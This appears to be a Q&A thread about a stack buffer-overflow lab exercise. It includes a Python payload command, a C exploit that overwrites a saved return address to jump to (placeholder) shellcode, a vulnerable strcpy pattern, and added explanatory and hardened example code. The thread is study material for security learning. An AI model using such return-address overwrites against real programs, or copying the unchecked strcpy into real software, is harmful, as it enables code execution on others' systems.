Using buffer overflows to execute shell code

Recently, I have been studying computer security and have come across several problems, and I have problems with this in particular.

I am provided with a fixed buffer function that I need to overflow in order to execute shellcode in the file shellcode. The function is pretty simple:

void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    //function provided to display stack on command prompt
    dump_stack((void **) buf, 21, (void **) &str);
}

My initial assumption was to change the return address, eip, function to find and execute what is in the shellcode file, but I realized that I do not have an address for the file that I can represent in hexadecimal value. I'm pretty sure I need to manipulate the return address, so currently I'm calling:

//the string is passed as a command line arg
./buffer_overflow_shellcode $(python -c "print 'A'*72 + '\x41\xd6\xff\xff' ")

my conclusion:

Stack dump:
0xffffd600: 0xffffd7fd (first argument)
0xffffd5fc: 0x08048653 (saved eip)
0xffffd5f8: 0xffffd641 (saved ebp)
0xffffd5f4: 0x41414141
0xffffd5f0: 0x41414141
0xffffd5ec: 0x41414141
0xffffd5e8: 0x41414141
0xffffd5e4: 0x41414141
0xffffd5e0: 0x41414141
0xffffd5dc: 0x41414141
0xffffd5d8: 0x41414141
0xffffd5d4: 0x41414141
0xffffd5d0: 0x41414141
0xffffd5cc: 0x41414141
0xffffd5c8: 0x41414141
0xffffd5c4: 0x41414141
0xffffd5c0: 0x41414141
0xffffd5bc: 0x41414141
0xffffd5b8: 0x41414141
0xffffd5b4: 0x41414141
0xffffd5b0: 0x41414141 (beginning of buffer)
Segmentation fault
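The dump above already tells you where each payload byte landed; the C program below, added here as an example that is not part of the question or any answer, parses a constructed copy of that dump, measures how far the "saved ebp" and "saved eip" slots sit from the start of buf, and checks which slot the four address bytes that follow the 72 'A's ended up in (the value printed for the saved-ebp slot, 0xffffd641, is exactly those bytes read as a little-endian word). The dump text is assumed to be the literal output of the question's dump_stack().

```c
#include <stdio.h>
#include <string.h>

/* Constructed copy of the dump_stack() output shown in the question. */
static const char *DUMP =
    "0xffffd600: 0xffffd7fd (first argument)\n"
    "0xffffd5fc: 0x08048653 (saved eip)\n"
    "0xffffd5f8: 0xffffd641 (saved ebp)\n"
    "0xffffd5f4: 0x41414141\n" "0xffffd5f0: 0x41414141\n"
    "0xffffd5ec: 0x41414141\n" "0xffffd5e8: 0x41414141\n"
    "0xffffd5e4: 0x41414141\n" "0xffffd5e0: 0x41414141\n"
    "0xffffd5dc: 0x41414141\n" "0xffffd5d8: 0x41414141\n"
    "0xffffd5d4: 0x41414141\n" "0xffffd5d0: 0x41414141\n"
    "0xffffd5cc: 0x41414141\n" "0xffffd5c8: 0x41414141\n"
    "0xffffd5c4: 0x41414141\n" "0xffffd5c0: 0x41414141\n"
    "0xffffd5bc: 0x41414141\n" "0xffffd5b8: 0x41414141\n"
    "0xffffd5b4: 0x41414141\n"
    "0xffffd5b0: 0x41414141 (beginning of buffer)\n";

#define MAX_SLOTS 32

typedef struct {
    unsigned long addr;   /* stack address of this 4-byte slot */
    unsigned long value;  /* contents dump_stack printed for it */
    char label[32];       /* text in parentheses, "" when unlabelled */
} slot_t;

/* Parse "0xADDR: 0xVALUE (label)" lines; returns the number of slots read. */
static int parse_dump(const char *text, slot_t *out, int max)
{
    int n = 0;
    while (*text && n < max) {
        const char *nl = strchr(text, '\n');
        size_t len = nl ? (size_t)(nl - text) : strlen(text);
        char line[128];
        if (len >= sizeof line)
            return -1;
        memcpy(line, text, len);
        line[len] = '\0';
        out[n].label[0] = '\0';
        if (sscanf(line, "%lx: %lx (%31[^)])",
                   &out[n].addr, &out[n].value, out[n].label) >= 2)
            n++;
        text = nl ? nl + 1 : text + len;
    }
    return n;
}

/* Index of the slot carrying 'label', or -1 when there is none. */
static int find_slot(const slot_t *s, int n, const char *label)
{
    for (int i = 0; i < n; i++)
        if (strcmp(s[i].label, label) == 0)
            return i;
    return -1;
}

/* Byte distance from the start of buf to the slot carrying 'label' (-1 if absent). */
long saved_register_offset(const char *label)
{
    slot_t s[MAX_SLOTS];
    int n = parse_dump(DUMP, s, MAX_SLOTS);
    int base = find_slot(s, n, "beginning of buffer");
    int hit = find_slot(s, n, label);
    if (base < 0 || hit < 0)
        return -1;
    return (long)(s[hit].addr - s[base].addr);
}

/* Decode 4 payload bytes as the little-endian word an x86 stack slot holds. */
static unsigned long le32(const unsigned char b[4])
{
    return (unsigned long)b[0] | ((unsigned long)b[1] << 8) |
           ((unsigned long)b[2] << 16) | ((unsigned long)b[3] << 24);
}

/* 1 if the slot 72 bytes past buf is the saved ebp and now holds the
 * question's '\x41\xd6\xff\xff', i.e. the address bytes landed there. */
int payload_word_landed_in_ebp(void)
{
    slot_t s[MAX_SLOTS];
    int n = parse_dump(DUMP, s, MAX_SLOTS);
    int base = find_slot(s, n, "beginning of buffer");
    const unsigned char tail[4] = { 0x41, 0xd6, 0xff, 0xff };
    if (base < 0)
        return 0;
    for (int i = 0; i < n; i++)
        if (s[i].addr == s[base].addr + 72)
            return strcmp(s[i].label, "saved ebp") == 0 && s[i].value == le32(tail);
    return 0;
}

int main(void)
{
    printf("saved ebp is %ld bytes past buf, saved eip is %ld bytes past buf\n",
           saved_register_offset("saved ebp"), saved_register_offset("saved eip"));
    printf("the 4 bytes after 'A'*72 %s the saved-ebp slot\n",
           payload_word_landed_in_ebp() ? "are what now sits in" : "did not reach");
    return 0;
}
```

Reading the distances off the dump rather than off the declared buffer size is the point: the compiler may pad or reorder locals, so the 64 in `char buf[64]` is not by itself the distance to either saved register.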


+12


#include <stdio.h>
#include <string.h>

/* the vulnerable function from the question; assumed to be linked in */
void vuln(char *str);

char shellcode[] = "\x90\x90\x90...";


int main()
{
        /* 
         * huge string (like your 72 A's) that appends the address of the 
         * shellcode at the right address (in your case I think it is 64 + 4) 
         */
        char evilstring[100]; 

        /* Fill the buf and the EBP with A */
        for (int i = 0; i < 64 + 4; i++) {
                evilstring[i] = 'A';
        }
        /* And the RET with the address of your shellcode: the raw pointer
         * bytes have to go in, not the "%p" text of the pointer. strcpy()
         * stops at the first zero byte, so an address containing 0x00
         * will be truncated there. */
        void *target = &shellcode[0];
        memcpy(&evilstring[68], &target, sizeof target);
        evilstring[68 + sizeof target] = '\0';
        vuln(evilstring);
        /* you should have a shell now */

        /* NOTREACHED */
        return 0;
}


+2
char buff[20];
unsigned int pass = 0;

when "buff" overflows, the auxiliary input turns "pass" into a value greater than 0, making it a "true" value.
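The adjacent-variable pattern this answer describes, shown as an added C example (not code from the answer) with the unchecked copy next to a bounded one. The names `check_unchecked`, `check_bounded` and the constructed inputs are assumptions for illustration; the unchecked version is present for comparison only and is never called, because calling it with a long input is undefined behaviour.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 20

/* The layout from the answer: a fixed buffer next to a flag. An unchecked
 * copy into buff can run past it into pass (where pass sits is up to the
 * compiler). Kept for comparison only; it is never called here. */
bool check_unchecked(const char *input, const char *expected)
{
    char buff[BUFF_SIZE];
    unsigned int pass = 0;
    strcpy(buff, input);                 /* writes past buff for long input */
    if (strcmp(buff, expected) == 0)
        pass = 1;
    return pass != 0;                    /* may read "true" after an overflow */
}

/* Hardened form: measure the input against the buffer before any copy,
 * reject what does not fit, and derive the result only from a real match. */
bool check_bounded(const char *input, const char *expected)
{
    char buff[BUFF_SIZE];
    size_t len = 0;
    /* bounded scan: never look further than BUFF_SIZE bytes into input */
    while (len < sizeof buff && input[len] != '\0')
        len++;
    if (len == sizeof buff)              /* no room left for the terminator */
        return false;
    memcpy(buff, input, len + 1);        /* fits, terminator included */
    return strcmp(buff, expected) == 0;
}

int main(void)
{
    /* constructed inputs: a matching one, a wrong one, and an oversize one */
    const char *too_long = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    printf("correct:  %d\n", check_bounded("letmein", "letmein"));
    printf("wrong:    %d\n", check_bounded("guess", "letmein"));
    printf("oversize: %d\n", check_bounded(too_long, "letmein"));
    return 0;
}
```

The length check happens before anything touches `buff`, so an oversize input is simply rejected; nothing adjacent to the buffer can be reached, whatever order the compiler chose for the locals.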

+1

It's not difficult once you know where to look: as said before, open the application with gdb and run it. Then use i(nfo) r(egisters) to understand why it crashed. Disassembly is also very useful.

Also, (assuming you know that this):

void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    //function provided to display stack on command prompt
    dump_stack((void **) buf, 21, (void **) &str);
}

is in fact:

void vuln(char *str) {
    void *return_address;   /* placed here implicitly by the caller's call instruction */
    char buf[64];

    /* Set Return value and store stack */
    strcpy(buf, str);
    //function provided to display stack on command prompt
    dump_stack((void **) buf, 21, (void **) &str);
    /* restore stack and jmp to return value. */
}
0